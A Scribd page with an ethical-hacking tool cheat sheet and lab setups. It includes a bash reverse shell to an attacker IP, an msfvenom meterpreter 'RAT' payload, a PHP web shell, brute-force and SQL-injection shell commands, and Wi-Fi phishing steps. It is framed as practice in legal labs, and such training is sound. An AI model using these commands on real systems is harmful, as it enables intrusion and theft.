Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
4 views5 pages

Hacking Practical Guide

This document is a comprehensive guide for practical ethical hacking, detailing installation and usage of essential hacking tools along with ready-made lab setups for hands-on practice. It includes instructions for tools like Nmap, Metasploit, SQLmap, and others, covering various hacking techniques such as network scanning, password cracking, and web application exploitation. The guide emphasizes legal use in controlled environments and provides specific lab setups for Wi-Fi hacking, web application testing, remote access trojans, forensics, and password cracking.

Uploaded by

yohel52580
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
4 views5 pages

Hacking Practical Guide

This document is a comprehensive guide for practical ethical hacking, detailing installation and usage of essential hacking tools along with ready-made lab setups for hands-on practice. It includes instructions for tools like Nmap, Metasploit, SQLmap, and others, covering various hacking techniques such as network scanning, password cracking, and web application exploitation. The guide emphasizes legal use in controlled environments and provides specific lab setups for Wi-Fi hacking, web application testing, remote access trojans, forensics, and password cracking.

Uploaded by

yohel52580
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

■ Complete Practical Ethical Hacking Guide

(Expanded with Labs) ■


This document is a **complete hacking lab and tools manual**. It contains: 1. Step-by-step
installation & usage of the most important hacking tools. 2. Practical commands for each tool. 3.
Ready-made LAB setups (Wi-Fi, Web Apps, RATs, Forensics, etc.) for hands-on practice. ■■
DISCLAIMER: Use only in legal test labs (HackTheBox, TryHackMe, DVWA, Metasploitable, local
Wi-Fi lab, etc.).

Tool 1: Nmap (Network Mapper)


Nmap is used for network discovery, scanning, and vulnerability detection.
# Basic scan
nmap 192.168.1.1
# OS detection
nmap -O 192.168.1.1
# Version detection
nmap -sV 192.168.1.1
# Aggressive scan
nmap -A 192.168.1.1

Tool 2: Netcat (nc)


Netcat is the Swiss army knife of networking: scanning, transfers, shells.
# Port scanning
nc -zv 192.168.1.1 20-1000
# Banner grabbing
nc 192.168.1.1 80
# Reverse shell
bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1

Tool 3: Metasploit Framework


Metasploit is a powerful exploitation framework.
# Start metasploit
msfconsole
# Search for exploits
search vsftpd
# Use exploit
use exploit/unix/ftp/vsftpd_234_backdoor
# Set target
set RHOST 192.168.1.10
# Set payload
set PAYLOAD linux/x86/meterpreter/reverse_tcp
# Run exploit
exploit

Tool 4: SQLmap
Automated SQL injection tool.
# Basic SQL injection test
sqlmap -u "http://target.com/page.php?id=1"
# Dump database
sqlmap -u "http://target.com/page.php?id=1" --dump
# Get OS shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell

Tool 5: Hydra
Fast brute force password cracking tool for many protocols.
# SSH brute force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
# FTP brute force
hydra -V -f -l admin -P passwords.txt ftp://192.168.1.5

Tool 6: Aircrack-ng
Wireless network cracking suite.
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Crack WPA/WPA2
aircrack-ng -w wordlist.txt capture.cap

Tool 7: Wifite
Automated Wi-Fi hacking tool.
# Run automated attacks
wifite
# Target a specific network
wifite -i wlan0mon --essid <SSID>

Tool 8: Wireshark
GUI packet sniffer and analyzer.
# Start capture on eth0
wireshark -i eth0
# Capture on wlan0 with filter
wireshark -i wlan0 -k -Y "http

Tool 9: Burp Suite


Web application security testing tool.
# Start Burp
burpsuite
# Configure proxy in browser (127.0.0.1:8080)
# Intercept traffic, scan for vulnerabilities
Tool 10: Hashcat
Advanced password cracking tool.
# Crack MD5 hash
hashcat -m 0 hash.txt wordlist.txt
# Crack SHA256 hash
hashcat -m 1400 hash.txt wordlist.txt

Tool 11: John the Ripper


Password cracker.
# Crack passwords
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Show cracked passwords
john --show hash.txt

Tool 12: Remote Access Trojans (RATs)


Used for remote control of systems (educational use in labs).
# Example with Metasploit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe > rat.exe

Tool 13: Web Shells


Malicious scripts uploaded to web servers for remote access.
# Example PHP web shell (educational)
<?php system($_GET['cmd']); ?>

Tool 14: Medusa


Brute-force password cracker similar to Hydra.
# SSH brute force
medusa -h 192.168.1.10 -u root -P wordlist.txt -M ssh

Tool 15: Autopsy


Digital forensics platform.
# Start Autopsy web interface
autopsy

Tool 16: King Phisher


Phishing campaign tool.
# Start King Phisher server
king-phisher
Tool 17: Wifiphisher
Automated phishing attacks against Wi-Fi clients.
# Start phishing attack
wifiphisher -i wlan0 -p firmware-upgrade

Tool 18: OpenSSL


Toolkit for SSL/TLS and encryption.
# Generate RSA private key
openssl genrsa -out key.pem 2048
# Generate CSR
openssl req -new -key key.pem -out req.csr
# Encrypt file
openssl enc -aes-256-cbc -in secret.txt -out secret.enc

Tool 19: Immunity Canvas


Commercial exploitation framework, similar to Metasploit.
# Start CANVAS
python canvas.py
■ Hacking Lab Setups ■
■ **Wi-Fi Hacking Lab Setup** Tools: Aircrack-ng, Wifite, Wifiphisher 1. Use a laptop/phone with
Wi-Fi adapter supporting monitor mode. 2. Boot Kali Linux or Termux with external Wi-Fi adapter. 3.
Start monitor mode: airmon-ng start wlan0 4. Capture traffic: airodump-ng wlan0mon 5. Launch
attacks with `aircrack-ng` or `wifite`. 6. Simulate phishing with `wifiphisher`. ■ Practice Goal: Learn
WPA2 handshake capture & dictionary cracking.

■ **Web Application Hacking Lab** Tools: Burp Suite, SQLmap, Metasploit, Web Shells 1. Install
DVWA (Damn Vulnerable Web App) on local Apache/PHP/MySQL. 2. Or use **bWAPP, Mutillidae,
Juice Shop** from Docker. 3. Run SQLmap against vulnerable parameters: sqlmap -u
"http://127.0.0.1/dvwa/vuln.php?id=1" --dump 4. Use Burp Suite as a proxy to intercept requests. 5.
Upload a simple web shell (PHP) to gain server control. ■ Practice Goal: Identify and exploit SQLi,
XSS, file upload vulnerabilities.

■ **Remote Access Trojan (RAT) Lab** Tools: Metasploit, msfvenom 1. Generate payload with
msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe
> rat.exe 2. Start Metasploit listener: use exploit/multi/handler set PAYLOAD
windows/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 4444 exploit 3. Execute rat.exe
inside Windows VM (Metasploitable/Win7 VM). 4. Gain reverse shell connection. ■ Practice Goal:
Understand RAT behavior in safe sandbox.

■ **Forensics & Incident Response Lab** Tools: Autopsy, Wireshark, Volatility 1. Capture packets
from your own network using Wireshark. 2. Analyze PCAP files for credentials, logins, HTTP traffic.
3. Mount disk images (dd files) into Autopsy. 4. Recover deleted files, analyze browser history,
extract evidence. 5. Use Volatility for memory dumps. ■ Practice Goal: Learn evidence recovery &
network analysis.

■ **Password Cracking Lab** Tools: Hashcat, John the Ripper, Hydra, Medusa 1. Collect hashes
from `/etc/shadow`, database dumps, or challenge files. 2. Crack MD5 with Hashcat: hashcat -m 0
hash.txt wordlist.txt 3. Crack SHA256 with John: john --wordlist=rockyou.txt hash.txt 4. Test Hydra
against test SSH service: hydra -l root -P rockyou.txt ssh://127.0.0.1 ■ Practice Goal: Understand
wordlist attacks, brute-force, hybrid attacks.

You might also like